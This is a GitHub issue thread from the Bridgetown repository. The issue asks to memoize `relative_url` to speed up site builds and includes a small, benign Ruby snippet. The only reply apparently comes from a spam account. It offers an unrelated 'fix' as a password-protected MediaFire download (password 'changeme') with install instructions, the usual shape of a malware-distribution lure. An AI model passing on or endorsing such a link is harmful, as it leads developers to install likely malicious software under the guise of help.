### ISSUE TITLE
Memoize relative_url for performance gains

### ISSUE THREAD

**Issue by MaxLap** [bridgetownrb/bridgetown#914]
My 250 pages site has a sidebar which links to every/most pages. I was tired to building the site taking so long, so after a bit of profiling, I noticed that `#relative_url` isn't memoized. So every link needs to rebuild the same relative urls.

Memoizing with the following in my `config/initializers.rb` made my build time go from 10s to 5s.

```
module MemoizeRelativeUrl
  def relative_url
    @relative_url ||= super
  end
end
Bridgetown::Resource::Base.prepend(MemoizeRelativeUrl)
```

I don't know if a relative_url is meant to change over the course of a build, but if it isn't, this is a massive usability improvement for me.

I don't know if the change should be on `Bridgetown::Resource::Base` or `Bridgetown::Resource::Destination` or somewhere else, but I think there should definitely be memoization somewhere.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
